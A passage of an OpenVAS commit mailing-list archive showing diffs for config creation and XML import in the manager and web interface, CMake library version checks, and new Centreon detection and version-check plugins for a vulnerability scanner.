+ config, + quoted_nvt_name, + quoted_type, + quoted_preference_name, + quoted_value); + g_free (quoted_nvt_name); + g_free (quoted_preference_name); + g_free (quoted_type); + g_free (quoted_value); + } + else + { + gchar *quoted_name; + + /* Presume scanner preference. */ + + quoted_name = sql_quote (preference->name); + quoted_value = sql_quote (preference->value); + sql ("INSERT into config_preferences (config, type, name, value)" + " VALUES (%llu, 'SERVER_PREFS', '%s', '%s');", + config, + quoted_name, + quoted_value); + g_free (quoted_name); + g_free (quoted_value); + } + } + return 0; +} + +/** + * @brief Create a config. + * + * @param[in] name Name of config and NVT selector. + * @param[in] comment Comment on config. + * @param[in] selectors NVT selectors. + * @param[in] preferences Preferences. + * + * @return 0 success, 1 config exists already, -1 error, -2 name empty, + * -3 input error in selectors, -4 input error in preferences. + */ +int +create_config (const char* name, const char* comment, + const array_t* selectors /* nvt_selector_t. */, + const array_t* preferences /* preference_t. */) +{ + int ret; + gchar* quoted_name; + gchar* quoted_comment; + config_t config; + + if (name == NULL || strlen (name) == 0) return -2; + + quoted_name = sql_quote (name); + + sql ("BEGIN IMMEDIATE;"); + + if (sql_int (0, 0, + "SELECT COUNT(*) FROM configs WHERE name = '%s';", + quoted_name)) + { + tracef (" config \"%s\" already exists\n", name); + sql ("ROLLBACK;"); + g_free (quoted_name); + return 1; + } + + /** @todo Reference selector in config by ROWID instead of by name. */ + if (sql_int (0, 0, + "SELECT COUNT(*) FROM nvt_selectors WHERE name = '%s' LIMIT 1;", + quoted_name)) + { + tracef (" NVT selector \"%s\" already exists\n", name); + sql ("ROLLBACK;"); + g_free (quoted_name); + return -1; + } + + if (comment) + { + quoted_comment = sql_nquote (comment, strlen (comment)); + sql ("INSERT INTO configs (name, nvt_selector, comment)" + " VALUES ('%s', '%s', '%s');", + quoted_name, quoted_name, quoted_comment); + g_free (quoted_comment); + } + else + sql ("INSERT INTO configs (name, nvt_selector, comment)" + " VALUES ('%s', '%s', '');", + quoted_name, quoted_name); + + /* Insert the selectors into the nvt_selectors table. */ + + config = sqlite3_last_insert_rowid (task_db); + if ((ret = insert_nvt_selectors (quoted_name, selectors))) + { + sql ("ROLLBACK;"); + g_free (quoted_name); + return ret; + } + + /* Insert the preferences into the config_preferences table. */ + + if ((ret = config_insert_preferences (config, preferences))) + { + sql ("ROLLBACK;"); + g_free (quoted_name); + return ret; + } + + /* Update family and NVT count caches. */ + + update_config_caches (name); + + sql ("COMMIT;"); + g_free (quoted_name); + return 0; +} + +/** * @brief Get the value of a config preference. * * @param[in] config Config. @@ -6501,7 +6708,7 @@ * @return 0 success, 1 config exists already, -1 error. */ int -create_config (const char* name, const char* comment, char* rc) +create_config_rc (const char* name, const char* comment, char* rc) { gchar* quoted_name = sql_nquote (name, strlen (name)); gchar* quoted_comment; @@ -7689,13 +7896,15 @@ * @brief Update the cached count and growing information in every config. * * It's up to the caller to organise a transaction. + * + * @param[in] name Name of config to update. NULL for all. */ static void -update_config_caches () +update_config_caches (const char *name) { iterator_t configs; - init_config_iterator (&configs, NULL, 1, NULL); + init_config_iterator (&configs, name, 1, NULL); while (next (&configs)) { const char *selector; @@ -7731,7 +7940,7 @@ void manage_complete_nvt_cache_update (int mode) { - update_config_caches (); + update_config_caches (NULL); if (mode == -2) sql ("COMMIT;"); } From scm-commit at wald.intevation.org Tue Jan 5 21:02:52 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 21:02:52 +0100 (CET) Subject: [Openvas-commits] r6315 - in trunk/gsa: . src src/html/src Message-ID: <20100105200252.6194D86607C3@pyrosoma.intevation.org> Author: mattm Date: 2010-01-05 21:02:51 +0100 (Tue, 05 Jan 2010) New Revision: 6315 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_omp.c trunk/gsa/src/gsad_omp.h trunk/gsa/src/html/src/omp.xsl Log: Add XML config importing. Remove RC file importing. * src/gsad_omp.c (create_config_omp): Remove RC file handling. (import_config_omp): New function. (export_config_omp): Use GET_CONFIGS export attribute. * src/gsad_omp.h: Update headers accordingly. * src/gsad.c (init_validator): Add import_config command. Remove rule "rcfile". Add rule "xml_file". (struct req_parms): Remove rcfile. Add xml_file. (free_resources, serve_post, exec_omp_post): Remove rcfile handling. Add xml_file handling. (exec_omp_get): Handle command import_config. * src/html/src/omp.xsl (html-create-config-form): Remove RC import option. (html-import-config-form): New template. (get_configs_response): Call html-import-config-form. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-05 19:53:07 UTC (rev 6314) +++ trunk/gsa/ChangeLog 2010-01-05 20:02:51 UTC (rev 6315) @@ -1,3 +1,24 @@ +2010-01-04 Matthew Mundell + + Add XML config importing. Remove RC file importing. + + * src/gsad_omp.c (create_config_omp): Remove RC file handling. + (import_config_omp): New function. + (export_config_omp): Use GET_CONFIGS export attribute. + + * src/gsad_omp.h: Update headers accordingly. + + * src/gsad.c (init_validator): Add import_config command. Remove rule + "rcfile". Add rule "xml_file". + (struct req_parms): Remove rcfile. Add xml_file. + (free_resources, serve_post, exec_omp_post): Remove rcfile handling. Add + xml_file handling. + (exec_omp_get): Handle command import_config. + + * src/html/src/omp.xsl (html-create-config-form): Remove RC import option. + (html-import-config-form): New template. + (get_configs_response): Call html-import-config-form. + 2010-01-05 Felix Wolfsteller Added basic auto-refresh functionality for the tasks table. @@ -33,11 +54,11 @@ * CMakeLists.txt: Added clumsy libopenvas required version check and TODO regarding possible improvements. -2009-01-05 Felix Wolfsteller +2010-01-05 Felix Wolfsteller * CMakeLists.txt: Lowercased some cmake commands. -2009-01-04 Matthew Mundell +2010-01-04 Matthew Mundell Add config exporting. @@ -50,7 +71,7 @@ * src/html/src/omp.xsl (config): Add an export button. -2009-01-04 Matthew Mundell +2010-01-04 Matthew Mundell * src/gsad.c (init_validator): Add email rule. (escalator_data): New function. Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-05 19:53:07 UTC (rev 6314) +++ trunk/gsa/src/gsad.c 2010-01-05 20:02:51 UTC (rev 6315) @@ -196,6 +196,7 @@ "|(get_target)" "|(get_targets)" "|(get_users)" + "|(import_config)" "|(test_escalator)" "|(save_config)" "|(save_config_family)" @@ -227,7 +228,7 @@ /** @todo Better regex. */ openvas_validator_add (validator, "preference_name", "^(.*){0,400}$"); openvas_validator_add (validator, "pw", "^[[:alnum:]]{1,10}$"); - openvas_validator_add (validator, "rcfile", NULL); + openvas_validator_add (validator, "xml_file", NULL); openvas_validator_add (validator, "report_id", "^[a-z0-9\\-]+$"); openvas_validator_add (validator, "role", "^[[:alnum:] ]{1,40}$"); openvas_validator_add (validator, "task_id", "^[a-z0-9\\-]+$"); @@ -311,7 +312,7 @@ char *sort_field; ///< Value of "sort_field" parameter. char *sort_order; ///< Value of "sort_order" parameter. char *levels; ///< Value of "levels" parameter. - char *rcfile; ///< Value of "rcfile" parameter. + char *xml_file; ///< Value of "xml_file" parameter. char *role; ///< Value of "role" parameter. char *submit; ///< Value of "submit" parameter. char *hosts; ///< Value of "hosts" parameter. @@ -486,7 +487,7 @@ free (con_info->req_parms.method); free (con_info->req_parms.scanconfig); free (con_info->req_parms.scantarget); - free (con_info->req_parms.rcfile); + free (con_info->req_parms.xml_file); free (con_info->req_parms.role); free (con_info->req_parms.submit); free (con_info->req_parms.hosts); @@ -897,24 +898,24 @@ con_info->answercode = MHD_HTTP_OK; return MHD_YES; } - if (!strcmp (key, "rcfile")) + if (!strcmp (key, "xml_file")) { - if (con_info->req_parms.rcfile) + if (con_info->req_parms.xml_file) { - int prevsize = strlen (con_info->req_parms.rcfile); - con_info->req_parms.rcfile = - realloc (con_info->req_parms.rcfile, prevsize + size + 1); - memcpy (&con_info->req_parms.rcfile[prevsize], (char *) data, + int prevsize = strlen (con_info->req_parms.xml_file); + con_info->req_parms.xml_file = + realloc (con_info->req_parms.xml_file, prevsize + size + 1); + memcpy (&con_info->req_parms.xml_file[prevsize], (char *) data, size); - con_info->req_parms.rcfile[size + prevsize] = 0; + con_info->req_parms.xml_file[size + prevsize] = 0; con_info->answercode = MHD_HTTP_OK; return MHD_YES; } else { - con_info->req_parms.rcfile = malloc (size + 1); - memcpy ((char *) con_info->req_parms.rcfile, (char *) data, size); - con_info->req_parms.rcfile[size] = 0; + con_info->req_parms.xml_file = malloc (size + 1); + memcpy ((char *) con_info->req_parms.xml_file, (char *) data, size); + con_info->req_parms.xml_file[size] = 0; con_info->answercode = MHD_HTTP_OK; return MHD_YES; } @@ -1519,7 +1520,6 @@ con_info->response = create_config_omp (credentials, con_info->req_parms.name, con_info->req_parms.comment, - con_info->req_parms.rcfile, con_info->req_parms.base); } else if (!strcmp (con_info->req_parms.cmd, "get_status")) @@ -1530,6 +1530,11 @@ con_info->req_parms.sort_order, ""); } + else if (!strcmp (con_info->req_parms.cmd, "import_config")) + { + con_info->response = + import_config_omp (credentials, con_info->req_parms.xml_file); + } else if (!strcmp (con_info->req_parms.cmd, "save_config")) { if (openvas_validate (validator, "name", con_info->req_parms.name)) Modified: trunk/gsa/src/gsad_omp.c =================================================================== --- trunk/gsa/src/gsad_omp.c 2010-01-05 19:53:07 UTC (rev 6314) +++ trunk/gsa/src/gsad_omp.c 2010-01-05 20:02:51 UTC (rev 6315) @@ -2422,21 +2422,18 @@ * @param[in] credentials Username and password for authentication. * @param[in] name Name of new config. * @param[in] comment Comment on new config. - * @param[in] rcfile RC for new config as a string. - * @param[in] base What to use as base for new config: "file" for - * rcfile, "full" for "Full and fast". + * @param[in] base Name of config to use as base for new config. * * @return Result of XSL transformation. */ char * create_config_omp (credentials_t * credentials, char *name, char *comment, - char *rcfile, const char *base) + const char *base) { entity_t entity; gnutls_session_t session; GString *xml = NULL; int socket; - gchar *rc_encoded = NULL; if (manager_connect (credentials, &socket, &session)) return gsad_message ("Internal error", __FUNCTION__, __LINE__, @@ -2449,52 +2446,10 @@ if (name == NULL || comment == NULL || base == NULL) g_string_append (xml, GSAD_MESSAGE_INVALID_PARAM ("Create Scan Config")); - else if (strcmp (base, "file") == 0) - { - /* Create the config. */ - - rc_encoded = g_base64_encode ((guchar *) rcfile, strlen (rcfile)); - if (openvas_server_sendf (&session, - "" - "%s" - "%s" - "%s%s%s" - "", - name, - rc_encoded, - comment ? "" : "", - comment ? comment : "", - comment ? "" : "") == -1) - { - g_free (rc_encoded); - g_string_free (xml, TRUE); - openvas_server_close (socket, session); - return gsad_message ("Internal error", __FUNCTION__, __LINE__, - "An internal error occurred while creating a new config. " - "No new config was created. " - "Diagnostics: Failure to send command to manager daemon.", - "/omp?cmd=get_configs"); - } - g_free (rc_encoded); - - entity = NULL; - if (read_entity_and_string (&session, &entity, &xml)) - { - g_string_free (xml, TRUE); - openvas_server_close (socket, session); - return gsad_message ("Internal error", __FUNCTION__, __LINE__, - "An internal error occurred while creating a new config. " - "It is unclear whether the config has been created or not. " - "Diagnostics: Failure to receive response from manager daemon.", - "/omp?cmd=get_configs"); - } - free_entity (entity); - } else { /* Create the config. */ - rc_encoded = g_base64_encode ((guchar *) rcfile, strlen (rcfile)); if (openvas_server_sendf (&session, "" "%s" @@ -2507,7 +2462,6 @@ comment ? comment : "", comment ? "" : "") == -1) { - g_free (rc_encoded); g_string_free (xml, TRUE); openvas_server_close (socket, session); return gsad_message ("Internal error", __FUNCTION__, __LINE__, @@ -2516,7 +2470,6 @@ "Diagnostics: Failure to send command to manager daemon.", "/omp?cmd=get_configs"); } - g_free (rc_encoded); entity = NULL; if (read_entity_and_string (&session, &entity, &xml)) @@ -2570,6 +2523,99 @@ } /** + * @brief Import config, get all configs, XSL transform the result. + * + * @param[in] credentials Username and password for authentication. + * @param[in] xml_file Config XML for new config. + * + * @return Result of XSL transformation. + */ +char * +import_config_omp (credentials_t * credentials, char *xml_file) +{ + entity_t entity; + gnutls_session_t session; + GString *xml = NULL; + int socket; + + if (manager_connect (credentials, &socket, &session)) + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while importing a config. " + "No new config was created. " + "Diagnostics: Failure to connect to manager daemon.", + "/omp?cmd=get_configs"); + + xml = g_string_new (""); + + /* Create the config. */ + + if (openvas_server_sendf (&session, + "" + "%s" + "", + xml_file) + == -1) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while importing a config. " + "No new config was created. " + "Diagnostics: Failure to send command to manager daemon.", + "/omp?cmd=get_configs"); + } + + entity = NULL; + if (read_entity_and_string (&session, &entity, &xml)) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while importing a config. " + "It is unclear whether the config has been created or not. " + "Diagnostics: Failure to receive response from manager daemon.", + "/omp?cmd=get_configs"); + } + free_entity (entity); + + /* Get all the configs. */ + + if (openvas_server_send (&session, + "") + == -1) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while importing a config. " + "The new config was, however, created. " + "Diagnostics: Failure to send command to manager daemon.", + "/omp?cmd=get_configs"); + } + + entity = NULL; + if (read_entity_and_string (&session, &entity, &xml)) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while importing a config. " + "The new config was, however, created. " + "Diagnostics: Failure to receive response from manager daemon.", + "/omp?cmd=get_configs"); + } + free_entity (entity); + + /* Cleanup, and return transformed XML. */ + + g_string_append (xml, ""); + openvas_server_close (socket, session); + return xsl_transform_omp (credentials, g_string_free (xml, FALSE)); +} + +/** * @brief Get one or all configs, XSL transform the result. * * @param[in] credentials Username and password for authentication. @@ -3470,9 +3516,7 @@ if (openvas_server_sendf (&session, "", + " export=\"1\"/>", name) == -1) { Modified: trunk/gsa/src/gsad_omp.h =================================================================== --- trunk/gsa/src/gsad_omp.h 2010-01-05 19:53:07 UTC (rev 6314) +++ trunk/gsa/src/gsad_omp.h 2010-01-05 20:02:51 UTC (rev 6315) @@ -103,8 +103,8 @@ char * save_config_nvt_omp (credentials_t *, const char *, const char *, const char *, const char *, const char *, GArray *, GArray *, const char *); -char * create_config_omp (credentials_t *, char *, char *, char *, - const char *); +char * create_config_omp (credentials_t *, char *, char *, const char *); +char * import_config_omp (credentials_t *, char *); char * delete_config_omp (credentials_t *, const char *); char * export_config_omp (credentials_t *, const char *, char **, char **, gsize *); Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-05 19:53:07 UTC (rev 6314) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-05 20:02:51 UTC (rev 6315) @@ -2486,13 +2486,6 @@ Full and fast - - - - Import config file - - - @@ -2508,6 +2501,39 @@
+ +
+
+
+
+ Import Scan Config + + + +
+
+
+ + + + + + + + + +
+ Import XML config +
+ +
+
+
+
+
+ +
@@ -3727,6 +3753,7 @@ + From scm-commit at wald.intevation.org Wed Jan 6 09:27:12 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 09:27:12 +0100 (CET) Subject: [Openvas-commits] r6316 - trunk/gsa Message-ID: <20100106082712.EF14986607C6@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 09:27:11 +0100 (Wed, 06 Jan 2010) New Revision: 6316 Modified: trunk/gsa/CMakeLists.txt trunk/gsa/ChangeLog Log: * CMakeLists.txt: Corrected libopenvas version check. * ChangeLog: Corrected date. Modified: trunk/gsa/CMakeLists.txt =================================================================== --- trunk/gsa/CMakeLists.txt 2010-01-05 20:02:51 UTC (rev 6315) +++ trunk/gsa/CMakeLists.txt 2010-01-06 08:27:11 UTC (rev 6316) @@ -100,14 +100,17 @@ list (GET LO_VER 1 LO_MINOR_VER) list (GET LO_VER 2 LO_PATCH_VER) set (LIBOPENVAS_SUFFICIENT TRUE) +# TODO Would like something like set (MIN_LO_VER "3" "0" "1") +# which would then make it easier to modify these. However, had serious +# issues with the conditionals, thus this clumsy implementation. if ( ${LO_MAJOR_VER} LESS 3 - OR ${LO_MINOR_VER} LESS 0 - OR ${LO_PATCH_VER} LESS 1 ) + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} LESS 0 + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} EQUAL 0 AND ${LO_PATCH_VER} LESS 1 ) message ("openvas-libraries version >= 3.0.1 not found.") set (LIBOPENVAS_SUFFICIENT FALSE) endif ( ${LO_MAJOR_VER} LESS 3 - OR ${LO_MINOR_VER} LESS 0 - OR ${LO_PATCH_VER} LESS 1 ) + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} LESS 0 + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} EQUAL 0 AND ${LO_PATCH_VER} LESS 1 ) if (NOT LIBS_FOUND OR NOT GSAD_LIBS_FOUND OR NOT LIBOPENVAS_SUFFICIENT) message (FATAL_ERROR "One or more reguired libraries was not found " Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-05 20:02:51 UTC (rev 6315) +++ trunk/gsa/ChangeLog 2010-01-06 08:27:11 UTC (rev 6316) @@ -1,5 +1,11 @@ -2010-01-04 Matthew Mundell +2010-01-06 Felix Wolfsteller + * CMakeLists.txt: Corrected libopenvas version check. + + * ChangeLog: Corrected date. + +2010-01-05 Matthew Mundell + Add XML config importing. Remove RC file importing. * src/gsad_omp.c (create_config_omp): Remove RC file handling. From scm-commit at wald.intevation.org Wed Jan 6 09:36:08 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 09:36:08 +0100 (CET) Subject: [Openvas-commits] r6317 - trunk/openvas-manager Message-ID: <20100106083608.C1EDC86607C6@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 09:36:08 +0100 (Wed, 06 Jan 2010) New Revision: 6317 Modified: trunk/openvas-manager/CMakeLists.txt trunk/openvas-manager/ChangeLog Log: * CMakeLists.txt: Added clumsy for check for libopenvas version from gsad. Modified: trunk/openvas-manager/CMakeLists.txt =================================================================== --- trunk/openvas-manager/CMakeLists.txt 2010-01-06 08:27:11 UTC (rev 6316) +++ trunk/openvas-manager/CMakeLists.txt 2010-01-06 08:36:08 UTC (rev 6317) @@ -156,7 +156,49 @@ ## Dependency checks ## ## TODO Also check for headers where needed. +## Improve for workflow: First collect list of missing libs, then print the +## list and throw an error, otherwise long install-cmake-install-cmake cycles +## might occur. +# TODO The version check of libopenvas will probably is required by other +# modules, too (e.g. gsad). Either +# 1) Move to the next CMake version with built-in version comparison functions +# 2) Use the pkg-config configuration file that kost provided when installing +# openvas-libraries +# 3) Move following checks in an own CMake- module to reuse. Other parts of +# the various CMakeLists.txt could be moved in a common ("openvas") module, +# too. + +## Check version of libopenvas +# Obtain libopenvas version number +find_program (PATH_TO_LIBOPENVASCONFIG libopenvas-config DOC "libopenvas-config program" + " to retrieve information about installed" + " openvas-libraries in the system.") +if (PATH_TO_LIBOPENVASCONFIG) + # Obtain libopenvas version number + exec_program (libopenvas-config + ARGS --version + OUTPUT_VARIABLE LIBOPENVAS_VERSION) + # Make a (per definition: semicolon separated) list of it + string (REGEX REPLACE "\\." ";" LO_VER ${LIBOPENVAS_VERSION}) + list (GET LO_VER 0 LO_MAJOR_VER) + list (GET LO_VER 1 LO_MINOR_VER) + list (GET LO_VER 2 LO_PATCH_VER) + set (LIBOPENVAS_SUFFICIENT TRUE) + # TODO Would like something like set (MIN_LO_VER "3" "0" "1") + # which would then make it easier to modify these. However, had serious + # issues with the conditionals, thus this clumsy implementation. + if ( ${LO_MAJOR_VER} LESS 3 + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} LESS 0 + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} EQUAL 0 AND ${LO_PATCH_VER} LESS 1 ) + message (FATAL_ERROR "openvas-libraries version >= 3.0.1 not found.") + endif ( ${LO_MAJOR_VER} LESS 3 + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} LESS 0 + OR ${LO_MAJOR_VER} EQUAL 3 AND ${LO_MINOR_VER} EQUAL 0 AND ${LO_PATCH_VER} LESS 1 ) +else (PATH_TO_LIBOPENVASCONFIG) + message (FATAL_ERROR "openvas-libraries version >= 3.0.1 not found.") +endif (PATH_TO_LIBOPENVASCONFIG) + message (STATUS "Looking for gnutls...") find_library (GNUTLS gnutls) message (STATUS "Looking for gnutls... ${GNUTLS}") Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-06 08:27:11 UTC (rev 6316) +++ trunk/openvas-manager/ChangeLog 2010-01-06 08:36:08 UTC (rev 6317) @@ -1,3 +1,8 @@ +2009-01-06 Felix Wolfsteller + + * CMakeLists.txt: Added clumsy for check for libopenvas version from + gsad. + 2009-01-05 Matthew Mundell Convert the GET_CONFIGS "nvt_selector" attribute to an "export" From scm-commit at wald.intevation.org Wed Jan 6 10:07:36 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 10:07:36 +0100 (CET) Subject: [Openvas-commits] r6318 - in trunk/gsa: . src/html/src Message-ID: <20100106090736.E9E5486607DC@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 10:07:34 +0100 (Wed, 06 Jan 2010) New Revision: 6318 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/omp.xsl Log: * src/html/src/omp.xsl: Fixed TODO: pre-select the chosen refresh interval in task overview table. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-06 08:36:08 UTC (rev 6317) +++ trunk/gsa/ChangeLog 2010-01-06 09:07:34 UTC (rev 6318) @@ -1,5 +1,10 @@ 2010-01-06 Felix Wolfsteller + * src/html/src/omp.xsl: Fixed TODO: pre-select the chosen refresh + interval in task overview table. + +2010-01-06 Felix Wolfsteller + * CMakeLists.txt: Corrected libopenvas version check. * ChangeLog: Corrected date. Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-06 08:36:08 UTC (rev 6317) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-06 09:07:34 UTC (rev 6318) @@ -42,11 +42,6 @@ - -
@@ -57,18 +52,44 @@ -
-
From scm-commit at wald.intevation.org Wed Jan 6 10:44:24 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 10:44:24 +0100 (CET) Subject: [Openvas-commits] r6319 - in trunk/openvas-plugins: . scripts Message-ID: <20100106094424.D00B386607C3@pyrosoma.intevation.org> Author: mime Date: 2010-01-06 10:44:19 +0100 (Wed, 06 Jan 2010) New Revision: 6319 Added: trunk/openvas-plugins/scripts/centreon_37383.nasl trunk/openvas-plugins/scripts/centreon_detect.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-06 09:07:34 UTC (rev 6318) +++ trunk/openvas-plugins/ChangeLog 2010-01-06 09:44:19 UTC (rev 6319) @@ -1,3 +1,9 @@ +2010-01-06 Michael Meyer + + * scripts/centreon_37383.nasl, + scripts/centreon_detect.nasl: + Added new plugins. + 2010-01-05 Michael Meyer * scripts/AproxEngine_detect.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-06 09:07:34 UTC (rev 6318) +++ trunk/openvas-plugins/cve_current.txt 2010-01-06 09:44:19 UTC (rev 6319) @@ -468,3 +468,4 @@ 37597 Greenbone svn R 37605 Greenbone svn R 37515 Greenbone svn R +37383 Greenbone svn R Added: trunk/openvas-plugins/scripts/centreon_37383.nasl =================================================================== --- trunk/openvas-plugins/scripts/centreon_37383.nasl 2010-01-06 09:07:34 UTC (rev 6318) +++ trunk/openvas-plugins/scripts/centreon_37383.nasl 2010-01-06 09:44:19 UTC (rev 6319) @@ -0,0 +1,88 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Centreon Authentication Mechanism Security Bypass Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100428); + script_bugtraq_id(37383); + script_version ("1.0-$Revision$"); + + script_name("Centreon Authentication Mechanism Security Bypass Vulnerability"); + +desc = "Overview: +Centreon is prone to a security-bypass vulnerability. + +An attacker can exploit this issue to bypass certain security +restrictions and gain unauthorized access to certain functionality, +which may lead to further attacks. + +Versions prior to Centreon 2.1.4 are vulnerable. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37383 +http://www.centreon.com/Development/changelog-2x.html +http://www.centreon.com/ + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if FIXME is FIXME"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("centreon_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/centreon")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; + +if(!isnull(vers) && vers >!< "unknown") { + + if(version_is_less(version: vers, test_version: "2.1.4")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/centreon_37383.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/centreon_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/centreon_detect.nasl 2010-01-06 09:07:34 UTC (rev 6318) +++ trunk/openvas-plugins/scripts/centreon_detect.nasl 2010-01-06 09:44:19 UTC (rev 6319) @@ -0,0 +1,116 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Centreon Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Centreon. Centreon is a network, system, +applicative supervision and monitoring tool, it is based upon the +Open Source monitoring engine : Nagios. Centreon can be used as a +Nagios GUI which gather a lots of new features. + +See also: +http://www.centreon.com/ + +Risk factor : None"; + +if (description) +{ + script_id(100427); + script_version ("1.0-$Revision$"); + + script_name("Centreon Detection"); + script_description(desc); + script_summary("Checks for the presence of Centreon"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/centreon",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/index.php"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if(egrep(pattern: "Centreon - IT & Network Monitoring", string: buf, icase: TRUE) && + "LoginInvitVersion" >< buf) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: '
